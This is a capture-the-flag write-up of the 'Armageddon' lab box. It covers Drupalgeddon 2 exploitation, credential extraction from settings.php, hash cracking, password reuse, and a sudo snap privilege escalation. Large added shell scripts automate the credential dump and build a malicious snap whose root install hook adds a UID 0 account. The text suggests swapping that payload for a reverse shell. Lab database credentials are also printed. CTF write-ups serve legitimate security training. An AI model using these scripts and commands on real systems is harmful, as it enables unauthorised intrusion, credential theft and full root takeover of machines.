# Armageddon

## Nmap

```
nmap 10.10.10.233 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
```

Port 80 hosts a web server which is visually identifiable as a Drupal instance.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUkeVYojbJgXUG2EN0av7%2Fimage.png?alt=media\&token=f18660f3-9666-41cd-b749-323066e9be75)

Standard enumeration did not reveal anything of interest, so drupwn was used to identify the exact version of Drupal installed.

**Github:** <https://github.com/immunIT/drupwn>

**Install**

```
git clone https://github.com/immunIT/drupwn.git
cd drupwn
python3 setup.py install
```

**Usage**

```
drupwn --mode enum --target http://10.10.10.233  
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGt3AQaHRmcZH5dw4kmkR%2Fimage.png?alt=media\&token=bab2173b-586b-4319-af68-943141d95e03)

`Searchsploit` shows that this version of Drupal (7.56) is vulnerable to "Drupalgeddon 2" (CVE-2018-7600), unauthenticated remote code execution through the Form API.

```bash
searchsploit -w "drupal 7.56"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F0hLrKIwM6MytHywpHtTX%2Fimage.png?alt=media\&token=c6f49523-90b7-4cad-a9c6-87b357591057)

Metasploit has a module for Drupalgeddon 2 (`exploit/unix/webapp/drupal_drupalgeddon2`). Once the correct options were set (at minimum `RHOSTS` and `LHOST`), the exploit was executed.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fk69tkyPhB3GYtW5IjxUp%2Fimage.png?alt=media\&token=3b051647-ec7c-4475-9e52-7ba5bd6d1d7a)

We receive a meterpreter shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUPZV3xMnE637kE8i7vAW%2Fimage.png?alt=media\&token=6f9c2e94-7de4-4bc7-b408-60652d887dc2)

With a shell, we find we are running as the *apache* user. Since Drupal is installed, the site's `settings.php` holds the MySQL connection details; the command below locates every `settings.php` on disk and prints the database-related lines (driver, host, port, database, username, password, table prefix and hash salt).

```bash
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlDHjlux99xTprRjtRTvg%2Fimage.png?alt=media\&token=2a2d460f-ac31-4e14-8f7e-8ba07e8b812e)

Using these credentials, a single command against `MySQL` dumps the `users` table, including the password hashes. `-e` runs the query and exits, so no interactive client session is needed from the web shell.

```bash
mysql -u drupaluser --password='CQHEy@9M*m23gBVj' -e 'use drupal; select * from users'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FluGfp26xsQWRjTKSZOmK%2Fimage.png?alt=media\&token=552445a0-1917-4b36-8b27-568f2fbcd4c7)
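The two steps above (pulling the connection settings out of `settings.php`, then querying the `users` table) are combined in the added example script below. It is not from the original write-up: it parses the `$databases` array of a Drupal 7 `settings.php` with `sed`, single-quotes the password so shell metacharacters such as `*` and `@` survive the command line, defaults host and port when they are blank, honours a table prefix, and prints the resulting `mysql -e` one-liner rather than executing it. The `settings.php` it writes for the stand-alone run is constructed for the example with made-up values.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): read the Drupal 7 database settings
# out of settings.php and compose the non-interactive mysql command that dumps
# the user hashes. The file written by make_sample_settings is constructed for
# this example; its values are not the target's.
set -eu

# drupal_db_setting <settings.php> <key>
# Prints the quoted value of the first  'key' => 'value'  line, i.e. the
# 'default' connection in a stock Drupal 7 settings.php. Empty if unset.
drupal_db_setting() {
    sed -n "/^[[:space:]]*'$2'[[:space:]]*=>/{s/^[[:space:]]*'$2'[[:space:]]*=>[[:space:]]*'\([^']*\)'.*/\1/p;q;}" "$1"
}

# shquote <string>: single-quote a value so characters such as * @ $ ! in a
# password survive the command line intact.
shquote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# drupal_users_query <settings.php>
# Builds the mysql one-liner, defaulting host/port and honouring a table prefix.
drupal_users_query() {
    local f="$1" db user pass host port prefix
    db=$(drupal_db_setting "$f" database)
    user=$(drupal_db_setting "$f" username)
    pass=$(drupal_db_setting "$f" password)
    host=$(drupal_db_setting "$f" host)
    port=$(drupal_db_setting "$f" port)
    prefix=$(drupal_db_setting "$f" prefix)
    printf 'mysql -h %s -P %s -u %s --password=%s -e %s\n' \
        "${host:-localhost}" "${port:-3306}" "$user" "$(shquote "$pass")" \
        "$(shquote "select uid, name, pass from ${db}.${prefix}users where status = 1")"
}

# make_sample_settings <path>: constructed Drupal 7 settings.php fragment.
make_sample_settings() {
    cat > "$1" <<'EOF'
<?php
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'example-Passw0rd!',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => 'd7_',
    ),
  ),
);
$drupal_hash_salt = 'constructed-salt-not-real';
EOF
}

# Usage: bash drupal_db.sh /var/www/html/sites/default/settings.php
# With no argument the script runs against the constructed sample above.
if [ "$#" -gt 0 ]; then
    drupal_users_query "$1"
else
    sample=$(mktemp)
    make_sample_settings "$sample"
    drupal_users_query "$sample"
    rm -f "$sample"
fi
```

The script only prints the command so it can be reviewed before running it from a low-privilege web shell; the blank `'port' => ''` in the sample is the common case in a stock install and falls back to 3306.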

Drupal 7 password hashes carry the `$S$` prefix, which `john` recognises as its `Drupal7` format; cracking against rockyou reveals the credentials `brucetherealadmin:boobo`.

```bash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/hash.txt   
```

The same password works over `SSH` for the *brucetherealadmin* account: the Drupal password has been reused for the system user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu36H5pPTcQRlxytJAPo5%2Fimage.png?alt=media\&token=cb6fc311-c088-47ea-8702-ff0b873d4423)

From here linpeas.sh was used to look for privilege escalation paths.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFMTerqDfqW4ROGHRa2ov%2Fimage.png?alt=media\&token=a6a63951-d1af-4cc3-a9e0-8c523111c84a)

We find the current user can run `/usr/bin/snap` as `root` via `sudo` without a password.

**GTFOBins:** <https://gtfobins.github.io/gtfobins/snap/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FD21c2uhGeqyJSFSrQhsb%2Fimage.png?alt=media\&token=971aa90f-a98c-4316-873e-aa7e6f4097ff)

As the GTFOBins entry shows, snapd runs a package's `install` hook as root, so a crafted snap whose hook contains our payload executes it as `root` the moment the package is installed.

The blog post linked below shows some ways in which this can be done.

**Blog:** <https://blog.ikuamike.io/posts/2021/package_managers_privesc/#exploitation-snap>

The Snap_Generator script below can also be used to craft the required `snap` package with a single command.

**Github:** <https://github.com/0xAsh/Snap_Generator>

**Install fpm (Required)**

```
sudo gem install fpm
```

**Download and prepare Snap_Generator**

```
wget https://raw.githubusercontent.com/0xAsh/Snap_Generator/main/snap_generator.sh && chmod +x snap_generator.sh
```

We then give `snap_generator.sh` the command our package should run as root at install time. In this instance it adds a second UID 0 account named `owned`: `-u 0 -o` permits the duplicate UID, and `-p` takes a crypt(3) hash, here MD5-crypt produced by `openssl passwd -1`.

```
/usr/sbin/useradd -p $(openssl passwd -1 Password123) -u 0 -o -s /bin/bash -m owned
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXvwp4cQTR4xxF2aW8OTy%2Fimage.png?alt=media\&token=cb0ef3de-c27d-4bdb-85da-eb176c03130a)

Upload the snap package to the target and install it through the `sudo` rule. `--dangerous` tells snapd to accept a local, unsigned snap with no assertions, and `--devmode` installs it without confinement, so the install hook runs as root and unsandboxed.

```
sudo -u root /usr/bin/snap install /home/brucetherealadmin/owned_1.0_all.snap --dangerous --devmode
```

After the install completes, check that the new user exists (for example in `/etc/passwd`).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fj1LwjxsUzS5AuQRqO1aA%2Fimage.png?alt=media\&token=86edd6d3-7abd-4b93-b65d-aa2cf2437f06)

Once confirmed, switch to the new user (`su owned`, password `Password123`), which gives a UID 0 shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXmAYoCVq1Ko37CQhnFWP%2Fimage.png?alt=media\&token=7e0f0193-e17e-4377-a122-1c8717b4fd90)
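The full privilege escalation above, as an added example that is not from the write-up, Snap_Generator or GTFOBins: a script that builds the same kind of package without `fpm`. A snap is a squashfs image containing `meta/snap.yaml`, and snapd executes `meta/hooks/install` as root during `snap install`, so the hook carries the `useradd` payload used above. It assumes `mksquashfs` (squashfs-tools) on the attacking machine, that the target's `sudo` rule allows `snap install` as root, and that the snap is installed with `--dangerous --devmode` as above; the `snap.yaml` fields and the `mksquashfs` options are my choices, not taken from the page.

```shell
#!/usr/bin/env bash
# Added example: build a snap whose install hook runs as root, without fpm.
# Assumptions (not from the write-up): mksquashfs is installed locally, the
# target's sudo rule allows `snap install` as root, and the snap is installed
# with --dangerous --devmode so the hook is neither signature-checked nor
# confined.
set -eu

# Payload snapd runs as root on the target at install time. Same account as
# the write-up: a second UID 0 user "owned" with password Password123. The
# $(openssl ...) is stored literally and expands on the target, not here.
ROOT_CMD='/usr/sbin/useradd -p $(openssl passwd -1 Password123) -u 0 -o -s /bin/bash -m owned'

# build_snap_tree <dir> <name> <command>
# Lays out the unpacked snap: meta/snap.yaml plus an executable install hook.
build_snap_tree() {
    local dir="$1" name="$2" cmd="$3"
    mkdir -p "$dir/meta/hooks"
    cat > "$dir/meta/snap.yaml" <<EOF
name: $name
version: '1.0'
summary: $name
description: $name
architectures: [all]
confinement: devmode
EOF
    # devmode confinement: with --devmode the hook is not sandboxed, so
    # useradd can write /etc/passwd and /etc/shadow on the host.
    printf '#!/bin/sh\n%s\n' "$cmd" > "$dir/meta/hooks/install"
    chmod 0755 "$dir/meta/hooks/install"
}

# check_snap_tree <dir>
# Returns 0 when the layout has what snapd needs: a snap.yaml with a name and
# an executable install hook that starts with a shebang.
check_snap_tree() {
    local dir="$1"
    [ -f "$dir/meta/snap.yaml" ] &&
    grep -q '^name: ' "$dir/meta/snap.yaml" &&
    [ -x "$dir/meta/hooks/install" ] &&
    head -n 1 "$dir/meta/hooks/install" | grep -q '^#!'
}

# pack_snap <dir> <out.snap>
# Snaps are squashfs images; xz compression, no xattrs, everything root-owned.
pack_snap() {
    mksquashfs "$1" "$2" -noappend -comp xz -no-xattrs -all-root >/dev/null
}

# Usage: bash build_snap.sh owned_1.0_all.snap
# Then on the target:
#   sudo -u root /usr/bin/snap install ./owned_1.0_all.snap --dangerous --devmode
if [ "$#" -gt 0 ]; then
    work=$(mktemp -d)
    build_snap_tree "$work" owned "$ROOT_CMD"
    check_snap_tree "$work"
    pack_snap "$work" "$1"
    rm -rf "$work"
    echo "built $1"
fi
```

The output filename is arbitrary; `unsquashfs -l owned_1.0_all.snap` lists the image locally to confirm `meta/hooks/install` is present before copying it to the target. Swap `ROOT_CMD` for any other command (a reverse shell, a `sudoers` line) and it runs as root in the same way.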
